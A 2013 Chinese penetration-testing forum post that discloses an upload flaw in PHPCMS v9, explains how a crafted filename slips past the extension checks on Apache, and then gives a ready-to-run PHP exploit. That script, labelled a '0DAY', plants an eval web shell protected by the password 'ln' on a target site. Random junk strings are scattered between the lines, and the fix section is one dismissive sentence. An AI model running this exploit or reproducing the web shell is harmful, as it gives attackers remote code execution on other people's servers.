中国网络渗透测试联盟
标题:
PHPCMS v9 Getshell
[打印本页]
作者:
admin
时间:
2013-3-7 13:06
标题:
PHPCMS v9 Getshell
漏洞类型: 文件上传导致任意代码执行
) ^" Q& [% J$ c/ V. y6 n
6 O. b. \: B; a3 f& Z( s
简要描述:
2 ?% q/ k; B* r
3 Y; y+ ?! C+ O1 ^& P% y$ J
phpcms v9 getshell (apache)
# v" I9 @/ T8 j" U0 g# O
详细说明:
% l7 e% Y" U* C9 U3 M, u* S
' i4 O$ h" p' x" P B
漏洞文件:phpcms\modules\attachment\attachments.php
0 q3 g8 a* H1 y
5 f& k. S1 \* T. r
public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
# e8 l% U1 g: |7 ~! T+ C) A) Q
后缀检测:phpcms\modules\attachment\functions\global.func.php
, Y1 T2 Z% h! m" P8 k, r
: ?; U% D/ i! Y" n2 g' a. }
" a1 v4 l9 P4 {& V
8 j! M7 c$ J& L' `1 m/ W4 h+ M
function is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; }
, A/ n6 K- a" |
8 k7 |! }8 ^3 n' t) r
关键函数:
3 s- V( v: N% a5 t1 E( Q: J3 s9 D
4 q3 v5 c* _ Z+ t( O
$ G; x; v/ o! I! ^5 Z
' p$ j& f+ P8 Q
function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
' ^$ r4 [- C$ S0 `' N8 w& w
0 X% v2 i& G# _- M! C" ^
Fileext函数是对文件后缀名的提取。
7 ~( \# P l8 p6 _9 m& u$ P$ I
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
# n/ v! C$ V6 o9 ]
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。
( B4 G1 Q% o9 t# W5 e
我们回到public function crop_upload() 函数中
. o7 {- S) B) _* s# k! o: d
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
3 z! M7 W* n: k( b2 L' a; B; _
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
" g0 s1 s" Q! y
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
) @! W8 F9 w$ ?% e" E0 _, T
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
j4 w% M' W# F! J2 o6 n$ O/ {
最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
: s8 A: d# |3 q* C8 a- X% e
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。
' z! f2 E' R" p' J$ ^6 }6 }0 G
漏洞证明:
! z/ m1 c9 R; n
2 U5 E- \" w. Y! o/ n
exp:
. i6 ^8 j+ I$ s- x
, O$ R7 ?4 v! W4 D, z3 H/ q! T
<?php
2 C# D- E/ D3 ]' ^4 v/ a
error_reporting(E_ERROR);
- s1 T4 x+ [5 ~3 ]+ g: b
set_time_limit(0);
, W% U; |9 i1 ~" I* R
$pass="ln";
9 f9 ~/ g# O; n( _5 t9 H
print_r('
0 T% }% V+ G0 m5 Q6 p
+---------------------------------------------------------------------------+
+ r: t' A8 j' A$ {+ ^3 V7 g
PHPCms V9 GETSHELL 0DAY
/ O2 l8 e3 N. ~5 o
code by L.N.
" C3 U& _: V: }1 J
. z* @# `) q) W% Y) }" _
apache 适用(利用的apache的解析漏洞) // 云安全
www.yunsec.net
# r0 X1 z1 M& d7 s$ [
+---------------------------------------------------------------------------+
) G+ W% a3 P9 k5 ^
');
$ g+ Q; r6 e* z5 ^" @' N
if ($argc < 2) {
6 n% P3 |/ h, ^' h, c
print_r('
$ q$ n) K% S* J4 g
+---------------------------------------------------------------------------+
, H% I% v* `2 R) f
Usage: php '.$argv[0].' url path
" Z+ o& W/ M0 y" w1 ~$ b
) o2 L; B" p" A, w3 f
Example:
9 E9 r2 o. X3 e. Z
1.php '.$argv[0].' lanu.sinaapp.com
- ]& j7 `2 c2 h) O: O0 g
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
3 A4 H' Z0 x; P$ i: S. I
+---------------------------------------------------------------------------+
0 X) ]! `4 n5 \
');
* I/ T1 O7 S1 J/ c# p
exit;
( k& l% x. }5 D. d6 t
}
- h8 L, g/ a/ L. |& t4 v/ C
4 F* `: P3 k! u
$url = $argv[1];
0 O$ `+ L. | M& q
$path = $argv[2];
0 S9 v2 ?- ] L7 N7 f' c, @7 G
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
5 S( l9 f. C4 t" C9 Q( o1 @* J
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
9 N8 x$ ^$ m- \8 n: @% z. o9 h, ]
if($ret=Create_dir($url,$path))
# g4 P) B- e# j$ |8 f' F! ^
{
( k% j( u# H7 }7 {; P5 _
//echo $ret;
( ]1 L- W. A) ?
$pattern = "|Server:[^,]+?|U";
* f' J/ j9 ~8 e2 b# T8 L% P$ V
preg_match_all($pattern, $ret, $matches);
0 L) T3 M1 e4 r
if($matches[0][0])
- q2 a' ^9 ]0 d6 ?2 c7 X9 v
{
_$ Y7 A6 z% b7 p) ~2 f7 J) z
if(strpos($matches[0][0],'Apache') == false)
& s3 a; P2 H0 k" P5 e1 V" G
{
1 T4 B( C0 ^( G) d8 A
echo "\n亲!此网站不是apache的网站。\n";exit;
4 J0 k. E0 `% ^. I" k
}
* `' R7 Y- Z. k3 G; P5 G2 J: r
}
) h0 G3 P- ^, P1 |/ v+ I
$ret = GetShell($url,$phpshell,$path,$file);
3 {8 S2 U( M: ~0 L5 `; }
$pattern = "|http:\/\/[^,]+?\.,?|U";
( a+ x& N3 c. h8 n Q& ?
preg_match_all($pattern, $ret, $matches);
) \$ C: R. U9 c
if($matches[0][0])
0 a; [2 x" C4 N4 C
{
/ o- l. Y) v) X5 R
echo "\n".'密码为: '.$pass."\n";
& |& ]) J7 n( C$ M
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
, C: S% u$ K9 F& f
}
! o8 I& y* j- A4 {5 F. m
else
/ h7 R8 {* ?1 u7 } h; Q
{
0 b% Z4 J0 [1 g& N; |, K( L
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
% B1 p3 X8 c( }! ^8 \
preg_match_all($pattern, $ret, $matches);
% I. u, J% P2 T Z8 M- g2 `& X
if($matches[0][0])
. ^ F5 n* }& J2 _; T) m5 c! O
{
" @" `* i6 A6 k$ Y- W+ U6 n
echo "\n".'密码为: '.$pass."\n";
2 s& h `) j( p
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
4 h0 o( y Y$ I- W! x& f
}
7 t" m3 P; O6 w; Z; V
else
, b" U9 ]7 I9 u9 S6 {' b
{
3 h2 m& L# i, w' V% Q
echo "\r\n没得到!\n";exit;
- k2 _& |8 u" R6 e( I, E6 w
}
* P$ o+ h- N- R
}
) L, d; e: ?' S' i, T4 g' `6 w
}
$ q3 ^$ e" C" V. T
; K9 V# Z3 o V
function GetShell($url,$shell,$path,$js)
$ z) l7 \- R+ y, }% T: L3 X% Y
{
" j8 J w& r' K; i
$content =$shell;
- F J% c. y! |/ n
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
6 c/ ]4 W. R& b% S- c
$data .= "Host: ".$url."\r\n";
0 N" n) o/ ]; Y
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
8 l$ I4 x+ C& L* k2 B5 ]1 j
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ N C( E# l7 M. _- P
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
; z- n1 f6 f2 k+ v& m- A& {
$data .= "Connection: close\r\n";
( K& y6 R/ b/ z& k
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
* s+ J: e, P. r% z6 k
$data .= $content."\r\n";
3 F( z2 k% {3 A5 [
$ock=fsockopen($url,80);
0 h5 n! u2 R0 U7 w8 x2 P
if (!$ock)
/ @) }3 a R' q2 a# f
{
3 k/ r& j0 I2 u) k0 l
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
/ i' z: @ w6 p7 K @
}
, W( D8 v) }; `9 l1 l
else
9 e) T+ X. w# r: y6 ]" W
{
" N7 E: z3 W- Z+ }
fwrite($ock,$data);
# ~* z2 c. u0 r% r( d& s
$resp = '';
" z$ |$ P+ \: O( m
while (!feof($ock))
5 @ R& @! f! B. i$ D$ L8 {8 H
{
+ O7 m+ B. w# t$ T1 @
$resp.=fread($ock, 1024);
' A/ p9 B5 G4 v! I
}
( v2 m& n5 \* j
return $resp;
$ `( M. X& b! f+ ?% b* c: K. j1 X$ T
}
% {) a# [9 p5 f9 I5 ]2 a# u
}
6 n/ _% V* @# S- F. c
6 G0 }1 g- t* H4 Q7 W
function Create_dir($url,$path='')
2 y4 o/ N5 C+ O
{
. |9 f0 y8 J7 V8 M/ R) c" _
$content ='I love you';
: G' c3 L7 h3 i) v1 d- k
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
& e* w' Q# b$ q4 V* }; i
$data .= "Host: ".$url."\r\n";
) m1 x& L# N) ^3 W2 t8 D
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
: l9 {8 A2 U) ]2 v: D8 x- w" n
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 p/ [: e! `( I) U# z1 J7 `8 O
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
0 M5 A7 K7 A9 O. A
$data .= "Connection: close\r\n";
: ]+ G0 n. a+ ~ x
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
' s" o, |7 ~) N! B# Q+ q
$data .= $content."\r\n";
2 t4 n+ [$ z/ n# i& Y
$ock=fsockopen($url,80);
8 B; o2 e2 X3 c2 c
if (!$ock)
# y$ f% C+ l$ T5 M
{
L7 \/ v2 o6 i; \
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
1 j* e6 p2 ?9 n4 ~6 V. d A
}
' S( `0 m4 {* E: Q- Z
fwrite($ock,$data);
0 W1 A1 h; y. Y/ ]0 R
$resp = '';
+ L7 K- O! q% L* r) ~
while (!feof($ock))
g5 I6 R' }$ j- x$ S. y
{
) x7 H' a1 _) n; k" ?5 B
$resp.=fread($ock, 1024);
7 S5 k- t9 Y- t. [5 W0 @( H4 C" f
}
: H3 i, T$ k# M" p- v9 H
return $resp;
2 p) G/ F- D& M. a7 A& t
}
% v4 `1 [! D* ^, |
?>
7 }' a# K$ P% e5 {
7 o4 d3 N2 n, `& B
修复方案:
! ~& X/ S$ @$ t0 [& M- m" ~
% N" q( G w' A4 Y
过滤过滤再过滤
5 i, _( ?5 i5 p" W2 ]2 \9 {5 m. ^8 I
& l/ ?0 k: y7 Q7 k0 Q7 q1 [7 j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2